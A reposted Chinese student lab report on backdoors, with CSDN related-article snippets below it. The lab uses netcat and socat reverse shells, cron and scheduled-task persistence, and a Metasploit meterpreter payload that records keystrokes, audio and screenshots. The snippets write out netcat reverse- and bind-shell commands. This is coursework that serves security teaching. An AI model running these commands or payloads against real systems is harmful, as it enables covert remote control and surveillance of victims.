20145329 《网络对抗技术》后门原理与实践

最新推荐文章于 2024-08-17 21:05:24 发布
最新推荐文章于 2024-08-17 21:05:24 发布
阅读量126 收藏
点赞数
文章标签: 操作系统 shell
原文链接:http://www.cnblogs.com/jdy1453/p/6579527.html
版权

实验内容

(1)使用netcat获取主机操作Shell,cron启动 (1分)

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?
(1)网上下载软件时点开的钓鱼网站
(2)手机短信上发送过来的链接
(3)陌生邮件
(4)弹窗的小广告

2.例举你知道的后门如何启动起来(win及linux)的方式?
(1)后门程序被植入以后,设定一个特定时间它自己自动启动
(2)捆绑一个其他程序,同时启动

3.Meterpreter有哪些给你映像深刻的功能?
(1)截屏以及拍照和摄像,简直太可怕,感觉电脑摄像头这么多年一直是像一只眼睛盯着我

4.如何发现自己有系统有没有被安装后门?
(1)最直观的就是杀毒软件会告诉你它拦截了恶意文件
(2)任务管理器里面发现有很多没有点击的软件在运行

实验总结与体会

这次实验操作性很强,而且与现实紧密结合,做起来乐趣无穷,让我从中也学到很多东西。首先不得不感叹的是身处一个互联网世界真的存在很多风险,在你毫无察觉的时候可能有人正在操作你的电脑,你的信息正在被别人窃取,甚至别人还通过你自己的摄像头观察者你的生活。无论在现实世界还是虚拟世界,提高安全意识很重要,不要什么链接都想点进去看一看,而且要提高自己的专业知识素养,学会用知识管理自己的个人信息安全,希望以后能在这门课上学到更多的知识,更好的使用网络。

实践过程记录

1.使用netcat获取主机操作Shell,cron启动

windows ip地址:
886473-20170319101749104-1642198793.png

Linux ip地址:
886473-20170319101803791-1943894652.jpg

1.1windows获得Linux shell

1.windows打开ncat进行监听
886473-20170319102518213-435386977.png

2.Linux反弹连接windows886473-20170319102535541-855567100.jpg

3.windows监听到Linux的连接,获得Linux shell,对Linux进行操作控制,如运行ls指令有效
886473-20170319102547135-1594622908.png

1.2Linux获得windows shell

1.Linux打开ncat进行监听
886473-20170319102803995-133010196.jpg

2.windows反弹连接Linux886473-20170319102813166-329323118.png

3.Linux监听到windows连接,获得windows shell,可以获取windows的电脑系统信息886473-20170319102828760-454538218.jpg

可以对windows进行操作,如运行ip查看有效
886473-20170319102843291-1372131547.jpg

1.3nc传输数据存储

将Linux监听到的连接并对windows shell操作获取获取的信息存入到.out文件中
886473-20170319103322979-213744863.jpg

对于windows不存在的指令ls会在windows shell中报错
886473-20170319103408557-154195643.png

1.4cron启动

1.crontab指令增加一条定时任务
886473-20170319103851995-607462993.jpg

2/crontab -e进行任务文件内容编辑
886473-20170319103952026-1733765368.png

3.crontab -l查看文件内容
886473-20170319104111323-1741816892.jpg

4.等待20分钟以后,或者将最后一排修改指令的最开头的数字修改为*以后,打开windows监听,无需Linux反弹连接即可对Linux shell进行操作,如运行ls可有效查看Linux文件夹
886473-20170319104501729-138728417.png

2.使用socat获取主机操作Shell, 任务计划启动

2.1windows获得Linux shell

1.将bash端口绑定到5329端口,同时把bash的stderr重定向到stdout
886473-20170319105049979-916994796.jpg

2.连接到服务器的5329端口,可以获得一个bash shell。(readline是gun的命令行编辑器,提供交互式的文本编辑功能)
886473-20170319105414604-616061346.png

2.2Linux获得windows shell

1.将cmd端口绑定到5329端口,同时把cmd的stderr重定向到stdout
886473-20170319105622432-586308662.png

2.连接到服务器的5329端口,可以获得一个cmd shell
886473-20170319105636416-372133847.png

2.3任务计划启动

在管理工具里面对任务计划进行设置,使用socat进行监听
886473-20170319110500885-877002592.png
886473-20170319110512166-1431414736.png
886473-20170319110448151-1576037721.png

3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

此时windows ip地址:192.168.43.221
Linux ip地址:192.168.15.128

1.将后门程序复制到新的文件夹/home/20145329进行操作

2.生成反弹式可执行文件,反弹回的地址为Linux的IP地址
886473-20170319111247182-1566125301.jpg

3.将Linux下生成的后门文件发送到windows下

  • windows打开监听端口准备接收文件
    886473-20170319111630198-451554232.png

  • Linux传送文件
    886473-20170319111723104-1065194792.jpg

  • 成功接收
    886473-20170319111735135-1370253470.png

  • 查杀软件查杀文件,关闭杀毒软件后重新传送,在windows用户文件夹中找到后门程序
    886473-20170319111936916-1160440135.png

4.打开msf监听进程,并修改ip和端口号并启动
886473-20170319112435182-710089653.jpg
886473-20170319112449104-1201494711.jpg
886473-20170319112507573-738365576.jpg
886473-20170319112610948-391845322.jpg

5.在windows下运行之前生成的后门程序

6.获得windows shell,可以对windows进行指令操作
886473-20170319112656401-1057370120.jpg

4.使用MSF meterpreter生成获取目标主机内容

1.音频
886473-20170319124058088-1135817631.jpg

2.摄像头
886473-20170319124118526-100807410.jpg
无法开启

3.击键记录
886473-20170319113116776-621357094.jpg

4.聊天
886473-20170319113045682-1369563461.png

5.获取用户信息以及系统信息
886473-20170319113000588-1576426718.jpg
886473-20170319113016948-687535154.jpg

6.截屏
886473-20170319124001338-1483703181.jpg

7.尝试提权
886473-20170319113433495-482430544.jpg
win8系统失败

转载于:https://www.cnblogs.com/jdy1453/p/6579527.html

dgflxcwno867930904
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 375
一、实验内容 1.使用netcat获取主机操作Shellcron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20145206 邹京儒 《网络攻防》 后门原理实践
weixin_30660027的博客
03-16 117
20145206 邹京儒 《网络攻防》 后门原理实践 一、实践过程记录 使用netcat获取主机操作Shellcron启动 1、linux获取windows的shell: 从码云上下载ncat.rar(kali中已经自带): 用ifconfig获取Kali的ip: 在kali下使用nc -l -p 5206来将5206设置成监听端口开始监听: windows下输入netcat.exe -...
如何启动netcat_Netcat用法--获得对Shell的远程访问
weixin_39735005的博客
12-19 286
有些人希望在远程服务器上进入熟悉的DOS提示状态。这时,可以在一台Windows系统的DOS提示符下运行nc.exe-l-p4455-ecmd.exe命令,这样任何远程登录到端口4455的Telnet甚至都不需要登录就可以看到一个DOSShell。1)连接到REMOTE主机,例子:格式:nc-nvv192.168.x.x80讲解:连到192.168.x.x的TCP80端口2)监听LOCAL主机,例...
socat使用笔记
weixin_30559481的博客
11-11 660
ubuntu下安装:sudo apt-get install socat socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。看一個例子: socat - tcp:1...
20155328 《网络攻防》实验二:后门原理实践
weixin_34221332的博客
04-02 581
20155328 《网络攻防》实验二:后门原理实践 实验问题回答 1.列举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站上下载软件时候的捆绑运行。 2.列举你知道的后门如何启动起来(win及linux)的方式? 恶意用户远程控制。 3.Meterpreter有哪些给你映像深刻的功能? 抓取摄像头,感觉像电影里的黑客镜头一样,很炫酷。还有击键记录。 4.如何发现自己有系统有没有被安装后...
Exp2 后门原理实践 20204308李文艳
m0_61155000的博客
03-23 393
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
高级渗透测试工程师进阶红蓝对抗技战术资料合集.zip
11-01
渗透测试涉及多种技术,包括网络扫描、漏洞探测、权限提升、后门安装等。首先,了解TCP/IP协议栈、HTTP/HTTPS协议以及网络服务原理是必要的。同时,熟练掌握常见的漏洞类型,如SQL注入、XSS攻击、命令注入等,以及...
网络安全理论与安全(西安电子科技大学通信工程学院信息工程系)
07-15
西安电子科技大学通信工程学院信息工程系开设的《网络安全理论与技术》课程旨在深入探讨网络安全的基本原理技术方法。网络安全是一个涉及保护计算机网络免受未经授权访问、攻击、损坏的重要领域。本课程由张卫东...
HellKitty-In-VC:Ring3 Rootkit后门
05-20
【HellKitty-In-VC: Ring3 Rootkit后门】是一种针对Windows操作系统的恶意软件,主要针对Win7 32位版本和XP系统。Rootkit是一种高级的恶意...理解和对抗这类威胁需要深入的网络安全知识,以及持续的安全实践和更新。
确保AD域控安全应对网络高级威胁攻击.pdf
08-06
AD域控制器的攻击原理和防护方法是网络技术领域中的一个重要话题。黑客攻击AD域控制器的主要原因在于其管理着进入企业内网的钥匙,控制着身份验证流程,保存所有密码,并对重要资产的访问权进行管理。这些关键功能的...
20155304《网络对抗》Exp2 后门原理实践
04-04 147
20155332《网络对抗》Exp2 后门原理实践 实验内容 (3.5分) (1)使用netcat获取主机操作Shellcron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF me...
2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理实践
a5251703897的博客
03-24 188
实验二后门原理实践 实验内容 (1)使用netcat获取主机操作Shellcron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录...
进程间通信 ---共享内存
BUG制造机的博客
08-14 1049
在这篇文章中向大家介绍了共享内存的原理以及常用的指令函数,希望大家有所收获!😁。
编译自定义Linux内核,使WSL支持访问Windows下USB设备
CYRUS STUDIO
08-13 889
在附加 USB 设备之前,必须使用命令 usbipd bind 来共享设备,从而允许它附加到 WSL( 需要管理员权限)。在 WSL 环境下,usbip 允许你在 Linux 子系统中访问连接到 Windows 主机的 USB 设备。下载内核源代码,通过 uname -r 命令查看 Linux 内核版本,checkout 对应的版本。通过以上步骤,WSL 2 将使用你自定义编译的内核来支持额外的驱动程序,特别是 USB 相关的功能。这里的 2-6 是 USB 设备对应的 BUSID。
应用站内组件模块间广播消息 Emitter - 鸿蒙 HarmonyOS Next
survivorsfyh的博客
08-14 270
应用站内组件模块间广播消息 Emitter - 鸿蒙 HarmonyOS Next 类似于 iOS 中的通知 NSNotificationCenter 或者 Android 的 EventBus
使用 Node.js 和 Express 框架通过网页访问GPIO和嵌入式 Linux 系统中使用 GSM/3G/4G 模块
最新发布
m0_45463480的博客
08-17 641
想要快速开发嵌入式 Linux 网络应用,控制硬件 GPIO,从而使得用户能够远程控制和监控系统。主要目的是向读者展示开发使用文件系统控制 GPIO 的 Node 代码、创建用户有好的界面、以及运行基于 Express 框架使用 AJAX 通客户端进行通信的网络服务器。为了理解客户端应用,建议先了解 HTML+CSS、jQuery 和 AJAX 知识。
Linux中查看正在监听的IP和端口
qq_52660422的博客
08-13 277
最近和其他终端设备联调时,需要去查看正在监听的IP和端口,以下在 Linux 系统中,可以使用以下命令查看正在监听的端口和 IP 地址。这个取决于当前Linux系统内已有的工具,如果不清楚,可以都试一下。
详解Linux命令--zip/unzip
简介
08-14 990
zip和unzip命令是Linux中最常用的命令之一,用于压缩和解压缩文件。本文将详细介绍zip和unzip命令的用法,并给出具体的示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值